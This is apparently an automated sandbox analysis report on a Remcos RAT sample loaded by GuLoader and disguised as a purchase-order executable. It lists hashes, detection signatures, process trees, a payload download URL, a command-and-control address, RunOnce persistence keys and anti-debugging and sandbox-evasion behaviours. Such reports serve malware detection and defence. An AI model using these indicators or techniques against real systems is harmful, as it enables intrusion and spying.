Play interactive tour

Edit tour

Analysis Report SBG-1100319PurchaseOrder.exe

Overview

General Information

Sample Name:	SBG-1100319PurchaseOrder.exe
Analysis ID:	388089
MD5:	2dd62d78b9f7e9c5529502e085b55756
SHA1:	151d4cd68958df35ae706cc232627a05e923307f
SHA256:	c63a3f86be406a11e8f7760403e407a97441753205f8cef432fd634856ca2992
Tags:	exeRATRemcosRAT
Infos:
Most interesting Screenshot:

Detection

Remcos GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Sigma detected: Remcos

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Contains functionality to hide a thread from the debugger

Creates autostart registry keys with suspicious values (likely registry only malware)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Yara detected VB6 Downloader Generic

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

SBG-1100319PurchaseOrder.exe (PID: 6224 cmdline: 'C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe' MD5: 2DD62D78B9F7E9C5529502E085B55756)

SBG-1100319PurchaseOrder.exe (PID: 6352 cmdline: 'C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe' MD5: 2DD62D78B9F7E9C5529502E085B55756)

wscript.exe (PID: 7152 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

filename1.exe (PID: 5936 cmdline: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe MD5: 2DD62D78B9F7E9C5529502E085B55756)

filename1.exe (PID: 5516 cmdline: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe MD5: 2DD62D78B9F7E9C5529502E085B55756)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cid=1685231EC8E4EC43&resid=1685231EC8E4EC43%2"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: filename1.exe PID: 5516	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: filename1.exe PID: 5516	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: SBG-1100319PurchaseOrder.exe PID: 6224	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: SBG-1100319PurchaseOrder.exe PID: 6224	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: SBG-1100319PurchaseOrder.exe PID: 6352	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: SBG-1100319PurchaseOrder.exe PID: 6352	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: filename1.exe PID: 5936	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: filename1.exe PID: 5936	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Remcos

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe, ProcessId: 6352, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=1685231EC8E4EC43&resid=1685231EC8E4EC43%2"}

Source: SBG-1100319PurchaseOrder.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://onedrive.live.com/download?cid=1685231EC8E4EC43&resid=1685231EC8E4EC43%2

Source: global traffic

TCP traffic: 192.168.2.7:49722 -> 79.134.225.124:2048

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502229070.0000000000971000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502229070.0000000000971000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502229070.0000000000971000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502105694.0000000000929000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502105694.0000000000929000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/b
Source: SBG-1100319PurchaseOrder.exe, filename1.exe, 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=1685231EC8E4EC43&resid=1685231EC8E4EC43%21505&authkey=ANKqoxx
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000003.345228305.0000000000971000.00000004.00000001.sdmp, SBG-1100319PurchaseOrder.exe, 00000002.00000002.502175655.000000000094A000.00000004.00000020.sdmp	String found in binary or memory: https://vug8la.am.files.1drv.com/
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.502229070.0000000000971000.00000004.00000020.sdmp, SBG-1100319PurchaseOrder.exe, 00000002.00000002.502196213.000000000095A000.00000004.00000020.sdmp	String found in binary or memory: https://vug8la.am.files.1drv.com/y4mT1QYIp_fyTE8Fy0lLLYF_0s99rPZfbzgWA1b5QlZt4eQwn4RVNktZv9qdlLB64Ai

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

Jump to behavior

Source: SBG-1100319PurchaseOrder.exe, 00000000.00000002.254532475.000000000075A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: SBG-1100319PurchaseOrder.exe

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056616E NtSetInformationThread,	2_2_0056616E
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00565D24 NtProtectVirtualMemory,	2_2_00565D24
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056645C NtSetInformationThread,	2_2_0056645C
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00566474 NtSetInformationThread,	2_2_00566474
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056640C NtSetInformationThread,	2_2_0056640C
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056642A NtSetInformationThread,	2_2_0056642A
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005664D8 NtSetInformationThread,	2_2_005664D8
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00565CCB NtProtectVirtualMemory,	2_2_00565CCB
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005664FA NtSetInformationThread,	2_2_005664FA
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00565CE1 NtProtectVirtualMemory,	2_2_00565CE1
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056648A NtSetInformationThread,	2_2_0056648A
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00566174 NtSetInformationThread,	2_2_00566174
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005661CE NtSetInformationThread,	2_2_005661CE
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005661FE NtSetInformationThread,	2_2_005661FE
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005661E8 NtSetInformationThread,	2_2_005661E8
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056618C NtSetInformationThread,	2_2_0056618C
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005661B8 NtSetInformationThread,	2_2_005661B8
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056624A NtSetInformationThread,	2_2_0056624A
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00566264 NtSetInformationThread,	2_2_00566264
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056621C NtSetInformationThread,	2_2_0056621C
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005662CA NtSetInformationThread,	2_2_005662CA
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005662F0 NtSetInformationThread,	2_2_005662F0
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00566296 NtSetInformationThread,	2_2_00566296
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00566280 NtSetInformationThread,	2_2_00566280
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005662B4 NtSetInformationThread,	2_2_005662B4
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056635A NtSetInformationThread,	2_2_0056635A
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056636E NtSetInformationThread,	2_2_0056636E
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00566306 NtSetInformationThread,	2_2_00566306
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056633C NtSetInformationThread,	2_2_0056633C
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00566324 NtSetInformationThread,	2_2_00566324
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005663C8 NtSetInformationThread,	2_2_005663C8
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005663E0 NtSetInformationThread,	2_2_005663E0
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056638E NtSetInformationThread,	2_2_0056638E
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_005663AE NtSetInformationThread,	2_2_005663AE
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056616E NtSetInformationThread,	13_2_0056616E
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00560500 EnumWindows,NtSetInformationThread,	13_2_00560500
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00565D24 NtProtectVirtualMemory,	13_2_00565D24
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00560754 NtProtectVirtualMemory,	13_2_00560754
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00565787 NtSetInformationThread,	13_2_00565787
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056645C NtSetInformationThread,	13_2_0056645C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00566474 NtSetInformationThread,	13_2_00566474
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056506E NtSetInformationThread,	13_2_0056506E
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056640C NtSetInformationThread,	13_2_0056640C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056642A NtSetInformationThread,	13_2_0056642A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005664D8 NtSetInformationThread,	13_2_005664D8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00565CCB NtProtectVirtualMemory,	13_2_00565CCB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005664FA NtSetInformationThread,	13_2_005664FA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00565CE1 NtProtectVirtualMemory,	13_2_00565CE1
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056648A NtSetInformationThread,	13_2_0056648A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00560D56 NtProtectVirtualMemory,	13_2_00560D56
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00566174 NtSetInformationThread,	13_2_00566174
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00566569 NtSetInformationThread,	13_2_00566569
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00560D13 NtProtectVirtualMemory,	13_2_00560D13
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00560D28 NtProtectVirtualMemory,	13_2_00560D28
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005661CE NtSetInformationThread,	13_2_005661CE
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005605CA NtSetInformationThread,	13_2_005605CA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005605F2 NtSetInformationThread,	13_2_005605F2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005661FE NtSetInformationThread,	13_2_005661FE
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005661E8 NtSetInformationThread,	13_2_005661E8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00560586 NtSetInformationThread,	13_2_00560586
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056618C NtSetInformationThread,	13_2_0056618C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005661B8 NtSetInformationThread,	13_2_005661B8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00560DA8 NtProtectVirtualMemory,	13_2_00560DA8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056624A NtSetInformationThread,	13_2_0056624A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00560664 NtSetInformationThread,	13_2_00560664
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00566264 NtSetInformationThread,	13_2_00566264
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056621C NtSetInformationThread,	13_2_0056621C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056062B NtSetInformationThread,	13_2_0056062B
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005606D4 NtSetInformationThread,	13_2_005606D4
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005662CA NtSetInformationThread,	13_2_005662CA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005662F0 NtSetInformationThread,	13_2_005662F0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00566296 NtSetInformationThread,	13_2_00566296
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00560698 NtSetInformationThread,	13_2_00560698
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00566280 NtSetInformationThread,	13_2_00566280
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005662B4 NtSetInformationThread,	13_2_005662B4
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056635A NtSetInformationThread,	13_2_0056635A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00564F76 NtSetInformationThread,	13_2_00564F76
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056636E NtSetInformationThread,	13_2_0056636E
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00566306 NtSetInformationThread,	13_2_00566306
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056633C NtSetInformationThread,	13_2_0056633C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00566324 NtSetInformationThread,	13_2_00566324
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005663C8 NtSetInformationThread,	13_2_005663C8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005663E0 NtSetInformationThread,	13_2_005663E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056638E NtSetInformationThread,	13_2_0056638E
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005663AE NtSetInformationThread,	13_2_005663AE

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 0_2_0223648A	0_2_0223648A
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_0056648A	2_2_0056648A
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00564700	2_2_00564700
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 12_2_021C648A	12_2_021C648A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_0056648A	13_2_0056648A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005665DA	13_2_005665DA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005629C7	13_2_005629C7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00564366	13_2_00564366
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00565363	13_2_00565363
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00564700	13_2_00564700
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005643B0	13_2_005643B0

Source: SBG-1100319PurchaseOrder.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: filename1.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SBG-1100319PurchaseOrder.exe, 00000000.00000002.254583063.0000000002200000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs SBG-1100319PurchaseOrder.exe
Source: SBG-1100319PurchaseOrder.exe, 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamehippoglossus.exe vs SBG-1100319PurchaseOrder.exe
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.507657061.000000001DEE0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs SBG-1100319PurchaseOrder.exe
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000000.253118213.0000000000432000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamehippoglossus.exe vs SBG-1100319PurchaseOrder.exe
Source: SBG-1100319PurchaseOrder.exe, 00000002.00000002.507717247.000000001E030000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs SBG-1100319PurchaseOrder.exe
Source: SBG-1100319PurchaseOrder.exe	Binary or memory string: OriginalFilenamehippoglossus.exe vs SBG-1100319PurchaseOrder.exe

Source: SBG-1100319PurchaseOrder.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@8/3@62/1

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

Mutant created: \Sessions\1\BaseNamedObjects\idll-WT08JM

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

File created: C:\Users\user\AppData\Local\Temp\subfolder1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs'

Source: SBG-1100319PurchaseOrder.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

File read: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe 'C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe'
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process created: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe 'C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process created: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe 'C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Jump to behavior

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: filename1.exe PID: 5516, type: MEMORY
Source: Yara match	File source: Process Memory Space: SBG-1100319PurchaseOrder.exe PID: 6224, type: MEMORY
Source: Yara match	File source: Process Memory Space: SBG-1100319PurchaseOrder.exe PID: 6352, type: MEMORY
Source: Yara match	File source: Process Memory Space: filename1.exe PID: 5936, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match	File source: Process Memory Space: filename1.exe PID: 5516, type: MEMORY
Source: Yara match	File source: Process Memory Space: SBG-1100319PurchaseOrder.exe PID: 6224, type: MEMORY
Source: Yara match	File source: Process Memory Space: SBG-1100319PurchaseOrder.exe PID: 6352, type: MEMORY
Source: Yara match	File source: Process Memory Space: filename1.exe PID: 5936, type: MEMORY

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 0_2_02235A0A push eax; ret	0_2_02235A0B
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Code function: 2_2_00563B8E pushad ; ret	2_2_00563BA2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 12_2_021C5A0A push eax; ret	12_2_021C5A0B
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_005629C7 pushad ; ret	13_2_00563BA2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe	Code function: 13_2_00563B8E pushad ; ret	13_2_00563BA2

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe

File created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)

Show sources

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs			Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs			Jump to behavior

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior

Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
